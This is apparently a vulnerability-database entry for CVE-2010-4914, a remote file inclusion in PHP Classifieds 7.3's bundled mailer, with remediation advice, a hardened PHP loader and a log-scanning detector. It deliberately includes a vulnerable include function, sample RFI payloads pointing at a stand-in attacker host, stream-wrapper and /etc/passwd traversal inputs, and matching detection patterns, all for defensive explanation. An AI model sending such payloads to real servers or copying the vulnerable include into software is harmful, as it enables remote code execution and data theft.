CVE-2010-4914 in PHP Classifieds

Summary

by MITRE

PHP remote file inclusion vulnerability in tools/phpmailer/class.phpmailer.php in PHP Classifieds 7.3 allows remote attackers to execute arbitrary PHP code via a URL in the lang_path parameter.


Analysis

by VulDB Data Team • 10/30/2025

CVE-2010-4914 is a remote file inclusion (RFI) flaw in PHP Classifieds 7.3. It sits in tools/phpmailer/class.phpmailer.php, the copy of the PHPMailer class bundled with the product, and concerns the lang_path parameter, which PHPMailer uses as the directory from which it includes its language file. Because PHP Classifieds lets that value be set from the request and does not restrict it to a local directory, an attacker can supply a URL; PHP then fetches the remote file and executes it as PHP code in the context of the web server process. The attacker sends the request directly, so no user interaction is needed.

The weakness class is CWE-98 (improper control of the filename used in a PHP include/require statement, i.e. PHP remote file inclusion), not command injection: no shell command is built, the PHP interpreter itself executes the fetched file because include() accepts URLs whenever allow_url_include is enabled (on PHP releases before 5.2.0, whenever allow_url_fopen is enabled). The root cause is that lang_path is never validated; it should be a directory fixed by the application, with the request at most selecting an allow-listed language code. In ATT&CK terms the exploitation is T1190, Exploit Public-Facing Application: the attacker hosts a PHP file on a server they control and points the vulnerable parameter at it.
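The mechanism above, as an added example that is not code from PHP Classifieds, PHPMailer or VulDB: a reconstruction of the vulnerable include shape beside a hardened replacement that fixes the directory and allow-lists the language code. The function names, the LANG_DIR location and the sample inputs are choices made for this example; the real code of class.phpmailer.php is not reproduced.

```php
<?php
// Added illustration for this entry; it is not the PHP Classifieds 7.3 or
// PHPMailer source. loadLanguageVulnerable() reconstructs the bug class the
// advisory describes (a request-controlled directory concatenated into an
// include); LANG_DIR, the function names and the inputs are example choices.
declare(strict_types=1);

// ---- Vulnerable shape (never call this with untrusted input) ----------------
// With allow_url_include=On, a value such as "http://attacker.example/" makes
// PHP fetch and execute http://attacker.example/phpmailer.lang-en.php.
// With it off, a traversal value still includes local files that carry the
// expected suffix, or (PHP before 5.3.4) any file when a NUL byte is appended.
function loadLanguageVulnerable(string $langPath, string $langType = 'en'): bool
{
    $loaded = @include $langPath . 'phpmailer.lang-' . $langType . '.php';
    return $loaded !== false;
}

// ---- Hardened replacement ---------------------------------------------------
// The directory is fixed by the application; the request may only choose a
// language code, which is allow-listed by pattern and confined with realpath().
define('LANG_DIR', sys_get_temp_dir() . '/rfi-demo-language');

function resolveLanguageFile(string $langType): ?string
{
    if (!preg_match('/^[a-z]{2}$/', $langType)) {   // e.g. "en", "de"
        return null;
    }
    $base = realpath(LANG_DIR);
    if ($base === false) {
        return null;
    }
    // realpath() returns false for missing files and for URLs or stream
    // wrappers; the prefix test rejects anything that escapes LANG_DIR.
    $candidate = realpath($base . '/phpmailer.lang-' . $langType . '.php');
    $prefix = $base . DIRECTORY_SEPARATOR;
    if ($candidate === false || strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $candidate;
}

function loadLanguageSafe(string $langType): bool
{
    $file = resolveLanguageFile($langType);
    if ($file === null) {
        return false;
    }
    return (include $file) === true;
}

// ---- Demonstration with constructed inputs ----------------------------------
// One legitimate language file is created so the allow-listed case can load.
@mkdir(LANG_DIR, 0700);
file_put_contents(LANG_DIR . '/phpmailer.lang-en.php', "<?php\nreturn true;\n");

$inputs = [
    'http://attacker.example/',      // classic RFI payload
    'php://filter/resource=',        // stream-wrapper variant
    '../../../../etc/passwd',        // traversal (LFI) variant
    'en',                            // the only acceptable kind of value
];
foreach ($inputs as $value) {
    printf("%-28s -> %s\n", $value, loadLanguageSafe($value) ? 'loaded' : 'rejected');
}
```

Run it with `php rfi_demo.php`; only the "en" input loads. The important design choice is that the request never contributes a path fragment at all, only a short token that is matched against a strict pattern and then resolved inside a directory the application owns, so neither allow_url_include nor the PHP version matters for the outcome.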

The impact is code execution as the web server user, which for a PHP application amounts to full compromise of the application: the attacker can read the configuration and database credentials, read or alter the classifieds data, drop a web shell for persistent access, and use the host as a pivot toward other systems on the network. Because the vulnerable file is the bundled mailer class rather than an obscure corner of the product, every installation of version 7.3 that exposes that path is affected. The flaw is reachable with a single crafted HTTP request and needs no account, which is why RFI of this kind is routinely probed by automated scanners.

Remediation has a code part and a configuration part. In code, the include must not take its directory from the request: fix lang_path to an application directory and restrict any request-controlled language selection to an allow-list of known codes. Apply the vendor fix if one is available; this entry does not record a fixed version, so installations still running 7.3 should be treated as vulnerable until the include is patched. In configuration, allow_url_include=Off in php.ini (the default since PHP 5.2.0) stops include() from fetching URLs and blocks the remote variant outright; allow_url_fopen=Off and open_basedir further limit what a compromised include can reach, though neither stops local file inclusion through traversal in the same parameter. A web application firewall or log rule should flag requests whose lang_path value carries a URL scheme, a PHP stream wrapper, or directory traversal. The entry's metadata (EPSS 0.02107, not in the CISA KEV catalogue, activity rated very low) indicates little current exploitation interest, which does not make an exposed instance safe: the exploit is a single HTTP request.
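For the detection point above, an added example (not from the entry or from VulDB) of the classification a WAF rule or log review would apply to the lang_path parameter, run over access-log lines constructed for the purpose. The log lines, the client addresses (documentation ranges) and the function names are assumptions made for this example.

```php
<?php
// Added detection example, not part of the VulDB entry. The access-log lines
// are constructed; the addresses are documentation ranges, no real host.
declare(strict_types=1);

// Returns why a lang_path value looks like an inclusion payload, or null.
function classifyLangPath(string $rawValue): ?string
{
    $value = rawurldecode($rawValue);   // decode once: %3A, %2F, %00 are common
    if (preg_match('#^(php|data|expect|phar|zip|glob|file)://#i', $value)) {
        return 'stream wrapper';
    }
    if (preg_match('#^[a-z][a-z0-9+.-]*://#i', $value) || strncmp($value, '//', 2) === 0) {
        return 'remote URL';
    }
    if (preg_match('#(^|[/\\\\])\.\.([/\\\\]|$)#', $value)) {
        return 'directory traversal';
    }
    if (strpos($value, "\0") !== false) {
        return 'NUL byte';
    }
    return null;
}

// Scans Common/Combined Log Format lines and returns one record per hit.
function scanAccessLog(array $lines): array
{
    $hits = [];
    foreach ($lines as $line) {
        if (!preg_match('#^(\S+) \S+ \S+ \[([^\]]+)\] "(?:GET|POST) (\S+) HTTP/[\d.]+"#', $line, $m)) {
            continue;                     // not a request line we understand
        }
        $client = $m[1];
        $when   = $m[2];
        $target = $m[3];
        $query  = parse_url($target, PHP_URL_QUERY);
        // Take the raw (still percent-encoded) value so it is decoded exactly once.
        if (!is_string($query) || !preg_match('#(?:^|&)lang_path=([^&]*)#', $query, $q)) {
            continue;
        }
        $reason = classifyLangPath($q[1]);
        if ($reason === null) {
            continue;                     // benign-looking value, e.g. "language/"
        }
        $hits[] = [
            'client' => $client,
            'time'   => $when,
            'path'   => parse_url($target, PHP_URL_PATH),
            'reason' => $reason,
            'value'  => $q[1],
        ];
    }
    return $hits;
}

// Constructed sample: three probes against the vulnerable file and one
// benign request that happens to carry the same parameter name.
$sampleLog = [
    '203.0.113.7 - - [08/Oct/2011:03:14:07 +0000] "GET /tools/phpmailer/class.phpmailer.php?lang_path=http://203.0.113.9/x/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [08/Oct/2011:03:14:09 +0000] "GET /tools/phpmailer/class.phpmailer.php?lang_path=php%3A%2F%2Ffilter%2Fresource%3D HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [08/Oct/2011:03:15:01 +0000] "GET /tools/phpmailer/class.phpmailer.php?lang_path=..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1" 200 512 "-" "curl/7.21"',
    '192.0.2.12 - - [08/Oct/2011:03:16:44 +0000] "GET /index.php?cat=cars&lang_path=language/ HTTP/1.1" 200 8192 "-" "Mozilla/5.0"',
];

foreach (scanAccessLog($sampleLog) as $hit) {
    printf("%-13s %s %-40s %-20s %s\n",
        $hit['client'], $hit['time'], $hit['path'], $hit['reason'], $hit['value']);
}
```

The first three lines are reported (remote URL, stream wrapper, directory traversal) and the fourth is not. In a WAF the same classification applies to the request before it reaches PHP; the decode-once rule matters because a rule that inspects the raw query misses `php%3A%2F%2F`, while one that decodes repeatedly produces false positives on legitimately encoded values.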

Reservation

10/07/2011

Disclosure

10/08/2011

Moderation

accepted

Entry

VDB-58931

CPE

ready

Exploit

Download

EPSS

0.02107

KEV

no

Activities

very low
